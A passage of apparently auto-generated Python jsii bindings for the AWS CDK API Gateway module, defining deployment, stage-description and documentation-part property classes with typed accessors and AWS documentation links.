:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription-methodsetting.html#cfn-apigateway-deployment-stagedescription-methodsetting-throttlingratelimit
"""
return self._values.get('throttling_rate_limit')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'MethodSettingProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDeployment.StageDescriptionProperty", jsii_struct_bases=[], name_mapping={'access_log_setting': 'accessLogSetting', 'cache_cluster_enabled': 'cacheClusterEnabled', 'cache_cluster_size': 'cacheClusterSize', 'cache_data_encrypted': 'cacheDataEncrypted', 'cache_ttl_in_seconds': 'cacheTtlInSeconds', 'caching_enabled': 'cachingEnabled', 'canary_setting': 'canarySetting', 'client_certificate_id': 'clientCertificateId', 'data_trace_enabled': 'dataTraceEnabled', 'description': 'description', 'documentation_version': 'documentationVersion', 'logging_level': 'loggingLevel', 'method_settings': 'methodSettings', 'metrics_enabled': 'metricsEnabled', 'tags': 'tags', 'throttling_burst_limit': 'throttlingBurstLimit', 'throttling_rate_limit': 'throttlingRateLimit', 'tracing_enabled': 'tracingEnabled', 'variables': 'variables'})
class StageDescriptionProperty():
def __init__(self, *, access_log_setting: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.AccessLogSettingProperty"]]]=None, cache_cluster_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, cache_cluster_size: typing.Optional[str]=None, cache_data_encrypted: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, cache_ttl_in_seconds: typing.Optional[jsii.Number]=None, caching_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, canary_setting: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.CanarySettingProperty"]]]=None, client_certificate_id: typing.Optional[str]=None, data_trace_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, description: typing.Optional[str]=None, documentation_version: typing.Optional[str]=None, logging_level: typing.Optional[str]=None, method_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnDeployment.MethodSettingProperty"]]]]]=None, metrics_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None, throttling_burst_limit: typing.Optional[jsii.Number]=None, throttling_rate_limit: typing.Optional[jsii.Number]=None, tracing_enabled: typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]=None, variables: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None):
"""
:param access_log_setting: ``CfnDeployment.StageDescriptionProperty.AccessLogSetting``.
:param cache_cluster_enabled: ``CfnDeployment.StageDescriptionProperty.CacheClusterEnabled``.
:param cache_cluster_size: ``CfnDeployment.StageDescriptionProperty.CacheClusterSize``.
:param cache_data_encrypted: ``CfnDeployment.StageDescriptionProperty.CacheDataEncrypted``.
:param cache_ttl_in_seconds: ``CfnDeployment.StageDescriptionProperty.CacheTtlInSeconds``.
:param caching_enabled: ``CfnDeployment.StageDescriptionProperty.CachingEnabled``.
:param canary_setting: ``CfnDeployment.StageDescriptionProperty.CanarySetting``.
:param client_certificate_id: ``CfnDeployment.StageDescriptionProperty.ClientCertificateId``.
:param data_trace_enabled: ``CfnDeployment.StageDescriptionProperty.DataTraceEnabled``.
:param description: ``CfnDeployment.StageDescriptionProperty.Description``.
:param documentation_version: ``CfnDeployment.StageDescriptionProperty.DocumentationVersion``.
:param logging_level: ``CfnDeployment.StageDescriptionProperty.LoggingLevel``.
:param method_settings: ``CfnDeployment.StageDescriptionProperty.MethodSettings``.
:param metrics_enabled: ``CfnDeployment.StageDescriptionProperty.MetricsEnabled``.
:param tags: ``CfnDeployment.StageDescriptionProperty.Tags``.
:param throttling_burst_limit: ``CfnDeployment.StageDescriptionProperty.ThrottlingBurstLimit``.
:param throttling_rate_limit: ``CfnDeployment.StageDescriptionProperty.ThrottlingRateLimit``.
:param tracing_enabled: ``CfnDeployment.StageDescriptionProperty.TracingEnabled``.
:param variables: ``CfnDeployment.StageDescriptionProperty.Variables``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html
"""
self._values = {
}
if access_log_setting is not None: self._values["access_log_setting"] = access_log_setting
if cache_cluster_enabled is not None: self._values["cache_cluster_enabled"] = cache_cluster_enabled
if cache_cluster_size is not None: self._values["cache_cluster_size"] = cache_cluster_size
if cache_data_encrypted is not None: self._values["cache_data_encrypted"] = cache_data_encrypted
if cache_ttl_in_seconds is not None: self._values["cache_ttl_in_seconds"] = cache_ttl_in_seconds
if caching_enabled is not None: self._values["caching_enabled"] = caching_enabled
if canary_setting is not None: self._values["canary_setting"] = canary_setting
if client_certificate_id is not None: self._values["client_certificate_id"] = client_certificate_id
if data_trace_enabled is not None: self._values["data_trace_enabled"] = data_trace_enabled
if description is not None: self._values["description"] = description
if documentation_version is not None: self._values["documentation_version"] = documentation_version
if logging_level is not None: self._values["logging_level"] = logging_level
if method_settings is not None: self._values["method_settings"] = method_settings
if metrics_enabled is not None: self._values["metrics_enabled"] = metrics_enabled
if tags is not None: self._values["tags"] = tags
if throttling_burst_limit is not None: self._values["throttling_burst_limit"] = throttling_burst_limit
if throttling_rate_limit is not None: self._values["throttling_rate_limit"] = throttling_rate_limit
if tracing_enabled is not None: self._values["tracing_enabled"] = tracing_enabled
if variables is not None: self._values["variables"] = variables
@property
def access_log_setting(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.AccessLogSettingProperty"]]]:
"""``CfnDeployment.StageDescriptionProperty.AccessLogSetting``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-accesslogsetting
"""
return self._values.get('access_log_setting')
@property
def cache_cluster_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.StageDescriptionProperty.CacheClusterEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-cacheclusterenabled
"""
return self._values.get('cache_cluster_enabled')
@property
def cache_cluster_size(self) -> typing.Optional[str]:
"""``CfnDeployment.StageDescriptionProperty.CacheClusterSize``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-cacheclustersize
"""
return self._values.get('cache_cluster_size')
@property
def cache_data_encrypted(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.StageDescriptionProperty.CacheDataEncrypted``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-cachedataencrypted
"""
return self._values.get('cache_data_encrypted')
@property
def cache_ttl_in_seconds(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.StageDescriptionProperty.CacheTtlInSeconds``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-cachettlinseconds
"""
return self._values.get('cache_ttl_in_seconds')
@property
def caching_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.StageDescriptionProperty.CachingEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-cachingenabled
"""
return self._values.get('caching_enabled')
@property
def canary_setting(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.CanarySettingProperty"]]]:
"""``CfnDeployment.StageDescriptionProperty.CanarySetting``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-canarysetting
"""
return self._values.get('canary_setting')
@property
def client_certificate_id(self) -> typing.Optional[str]:
"""``CfnDeployment.StageDescriptionProperty.ClientCertificateId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-clientcertificateid
"""
return self._values.get('client_certificate_id')
@property
def data_trace_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.StageDescriptionProperty.DataTraceEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-datatraceenabled
"""
return self._values.get('data_trace_enabled')
@property
def description(self) -> typing.Optional[str]:
"""``CfnDeployment.StageDescriptionProperty.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-description
"""
return self._values.get('description')
@property
def documentation_version(self) -> typing.Optional[str]:
"""``CfnDeployment.StageDescriptionProperty.DocumentationVersion``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-documentationversion
"""
return self._values.get('documentation_version')
@property
def logging_level(self) -> typing.Optional[str]:
"""``CfnDeployment.StageDescriptionProperty.LoggingLevel``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-logginglevel
"""
return self._values.get('logging_level')
@property
def method_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnDeployment.MethodSettingProperty"]]]]]:
"""``CfnDeployment.StageDescriptionProperty.MethodSettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-methodsettings
"""
return self._values.get('method_settings')
@property
def metrics_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.StageDescriptionProperty.MetricsEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-metricsenabled
"""
return self._values.get('metrics_enabled')
@property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``CfnDeployment.StageDescriptionProperty.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-tags
"""
return self._values.get('tags')
@property
def throttling_burst_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.StageDescriptionProperty.ThrottlingBurstLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-throttlingburstlimit
"""
return self._values.get('throttling_burst_limit')
@property
def throttling_rate_limit(self) -> typing.Optional[jsii.Number]:
"""``CfnDeployment.StageDescriptionProperty.ThrottlingRateLimit``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-throttlingratelimit
"""
return self._values.get('throttling_rate_limit')
@property
def tracing_enabled(self) -> typing.Optional[typing.Union[typing.Optional[bool], typing.Optional[aws_cdk.core.IResolvable]]]:
"""``CfnDeployment.StageDescriptionProperty.TracingEnabled``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-tracingenabled
"""
return self._values.get('tracing_enabled')
@property
def variables(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``CfnDeployment.StageDescriptionProperty.Variables``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-deployment-stagedescription.html#cfn-apigateway-deployment-stagedescription-variables
"""
return self._values.get('variables')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'StageDescriptionProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDeploymentProps", jsii_struct_bases=[], name_mapping={'rest_api_id': 'restApiId', 'deployment_canary_settings': 'deploymentCanarySettings', 'description': 'description', 'stage_description': 'stageDescription', 'stage_name': 'stageName'})
class CfnDeploymentProps():
def __init__(self, *, rest_api_id: str, deployment_canary_settings: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.DeploymentCanarySettingsProperty"]]]=None, description: typing.Optional[str]=None, stage_description: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.StageDescriptionProperty"]]]=None, stage_name: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::Deployment``.
:param rest_api_id: ``AWS::ApiGateway::Deployment.RestApiId``.
:param deployment_canary_settings: ``AWS::ApiGateway::Deployment.DeploymentCanarySettings``.
:param description: ``AWS::ApiGateway::Deployment.Description``.
:param stage_description: ``AWS::ApiGateway::Deployment.StageDescription``.
:param stage_name: ``AWS::ApiGateway::Deployment.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html
"""
self._values = {
'rest_api_id': rest_api_id,
}
if deployment_canary_settings is not None: self._values["deployment_canary_settings"] = deployment_canary_settings
if description is not None: self._values["description"] = description
if stage_description is not None: self._values["stage_description"] = stage_description
if stage_name is not None: self._values["stage_name"] = stage_name
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::Deployment.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-restapiid
"""
return self._values.get('rest_api_id')
@property
def deployment_canary_settings(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.DeploymentCanarySettingsProperty"]]]:
"""``AWS::ApiGateway::Deployment.DeploymentCanarySettings``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-deploymentcanarysettings
"""
return self._values.get('deployment_canary_settings')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Deployment.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-description
"""
return self._values.get('description')
@property
def stage_description(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDeployment.StageDescriptionProperty"]]]:
"""``AWS::ApiGateway::Deployment.StageDescription``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-stagedescription
"""
return self._values.get('stage_description')
@property
def stage_name(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::Deployment.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-deployment.html#cfn-apigateway-deployment-stagename
"""
return self._values.get('stage_name')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnDeploymentProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnDeploymentV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnDeploymentV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::Deployment``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::Deployment
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, api_id: str, description: typing.Optional[str]=None, stage_name: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::Deployment``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param api_id: ``AWS::ApiGatewayV2::Deployment.ApiId``.
:param description: ``AWS::ApiGatewayV2::Deployment.Description``.
:param stage_name: ``AWS::ApiGatewayV2::Deployment.StageName``.
"""
props = CfnDeploymentV2Props(api_id=api_id, description=description, stage_name=stage_name)
jsii.create(CfnDeploymentV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="apiId")
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Deployment.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html#cfn-apigatewayv2-deployment-apiid
"""
return jsii.get(self, "apiId")
@api_id.setter
def api_id(self, value: str):
return jsii.set(self, "apiId", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Deployment.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html#cfn-apigatewayv2-deployment-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@property
@jsii.member(jsii_name="stageName")
def stage_name(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Deployment.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html#cfn-apigatewayv2-deployment-stagename
"""
return jsii.get(self, "stageName")
@stage_name.setter
def stage_name(self, value: typing.Optional[str]):
return jsii.set(self, "stageName", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDeploymentV2Props", jsii_struct_bases=[], name_mapping={'api_id': 'apiId', 'description': 'description', 'stage_name': 'stageName'})
class CfnDeploymentV2Props():
def __init__(self, *, api_id: str, description: typing.Optional[str]=None, stage_name: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGatewayV2::Deployment``.
:param api_id: ``AWS::ApiGatewayV2::Deployment.ApiId``.
:param description: ``AWS::ApiGatewayV2::Deployment.Description``.
:param stage_name: ``AWS::ApiGatewayV2::Deployment.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html
"""
self._values = {
'api_id': api_id,
}
if description is not None: self._values["description"] = description
if stage_name is not None: self._values["stage_name"] = stage_name
@property
def api_id(self) -> str:
"""``AWS::ApiGatewayV2::Deployment.ApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html#cfn-apigatewayv2-deployment-apiid
"""
return self._values.get('api_id')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Deployment.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html#cfn-apigatewayv2-deployment-description
"""
return self._values.get('description')
@property
def stage_name(self) -> typing.Optional[str]:
"""``AWS::ApiGatewayV2::Deployment.StageName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-deployment.html#cfn-apigatewayv2-deployment-stagename
"""
return self._values.get('stage_name')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnDeploymentV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnDocumentationPart(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnDocumentationPart"):
"""A CloudFormation ``AWS::ApiGateway::DocumentationPart``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::DocumentationPart
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, location: typing.Union["LocationProperty", aws_cdk.core.IResolvable], properties: str, rest_api_id: str) -> None:
"""Create a new ``AWS::ApiGateway::DocumentationPart``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param location: ``AWS::ApiGateway::DocumentationPart.Location``.
:param properties: ``AWS::ApiGateway::DocumentationPart.Properties``.
:param rest_api_id: ``AWS::ApiGateway::DocumentationPart.RestApiId``.
"""
props = CfnDocumentationPartProps(location=location, properties=properties, rest_api_id=rest_api_id)
jsii.create(CfnDocumentationPart, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="location")
def location(self) -> typing.Union["LocationProperty", aws_cdk.core.IResolvable]:
"""``AWS::ApiGateway::DocumentationPart.Location``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html#cfn-apigateway-documentationpart-location
"""
return jsii.get(self, "location")
@location.setter
def location(self, value: typing.Union["LocationProperty", aws_cdk.core.IResolvable]):
return jsii.set(self, "location", value)
@property
@jsii.member(jsii_name="properties")
def properties(self) -> str:
"""``AWS::ApiGateway::DocumentationPart.Properties``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html#cfn-apigateway-documentationpart-properties
"""
return jsii.get(self, "properties")
@properties.setter
def properties(self, value: str):
return jsii.set(self, "properties", value)
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::DocumentationPart.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html#cfn-apigateway-documentationpart-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDocumentationPart.LocationProperty", jsii_struct_bases=[], name_mapping={'method': 'method', 'name': 'name', 'path': 'path', 'status_code': 'statusCode', 'type': 'type'})
class LocationProperty():
def __init__(self, *, method: typing.Optional[str]=None, name: typing.Optional[str]=None, path: typing.Optional[str]=None, status_code: typing.Optional[str]=None, type: typing.Optional[str]=None):
"""
:param method: ``CfnDocumentationPart.LocationProperty.Method``.
:param name: ``CfnDocumentationPart.LocationProperty.Name``.
:param path: ``CfnDocumentationPart.LocationProperty.Path``.
:param status_code: ``CfnDocumentationPart.LocationProperty.StatusCode``.
:param type: ``CfnDocumentationPart.LocationProperty.Type``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-documentationpart-location.html
"""
self._values = {
}
if method is not None: self._values["method"] = method
if name is not None: self._values["name"] = name
if path is not None: self._values["path"] = path
if status_code is not None: self._values["status_code"] = status_code
if type is not None: self._values["type"] = type
@property
def method(self) -> typing.Optional[str]:
"""``CfnDocumentationPart.LocationProperty.Method``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-documentationpart-location.html#cfn-apigateway-documentationpart-location-method
"""
return self._values.get('method')
@property
def name(self) -> typing.Optional[str]:
"""``CfnDocumentationPart.LocationProperty.Name``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-documentationpart-location.html#cfn-apigateway-documentationpart-location-name
"""
return self._values.get('name')
@property
def path(self) -> typing.Optional[str]:
"""``CfnDocumentationPart.LocationProperty.Path``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-documentationpart-location.html#cfn-apigateway-documentationpart-location-path
"""
return self._values.get('path')
@property
def status_code(self) -> typing.Optional[str]:
"""``CfnDocumentationPart.LocationProperty.StatusCode``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-documentationpart-location.html#cfn-apigateway-documentationpart-location-statuscode
"""
return self._values.get('status_code')
@property
def type(self) -> typing.Optional[str]:
"""``CfnDocumentationPart.LocationProperty.Type``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-documentationpart-location.html#cfn-apigateway-documentationpart-location-type
"""
return self._values.get('type')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'LocationProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDocumentationPartProps", jsii_struct_bases=[], name_mapping={'location': 'location', 'properties': 'properties', 'rest_api_id': 'restApiId'})
class CfnDocumentationPartProps():
def __init__(self, *, location: typing.Union["CfnDocumentationPart.LocationProperty", aws_cdk.core.IResolvable], properties: str, rest_api_id: str):
"""Properties for defining a ``AWS::ApiGateway::DocumentationPart``.
:param location: ``AWS::ApiGateway::DocumentationPart.Location``.
:param properties: ``AWS::ApiGateway::DocumentationPart.Properties``.
:param rest_api_id: ``AWS::ApiGateway::DocumentationPart.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html
"""
self._values = {
'location': location,
'properties': properties,
'rest_api_id': rest_api_id,
}
@property
def location(self) -> typing.Union["CfnDocumentationPart.LocationProperty", aws_cdk.core.IResolvable]:
"""``AWS::ApiGateway::DocumentationPart.Location``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html#cfn-apigateway-documentationpart-location
"""
return self._values.get('location')
@property
def properties(self) -> str:
"""``AWS::ApiGateway::DocumentationPart.Properties``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html#cfn-apigateway-documentationpart-properties
"""
return self._values.get('properties')
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::DocumentationPart.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationpart.html#cfn-apigateway-documentationpart-restapiid
"""
return self._values.get('rest_api_id')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnDocumentationPartProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
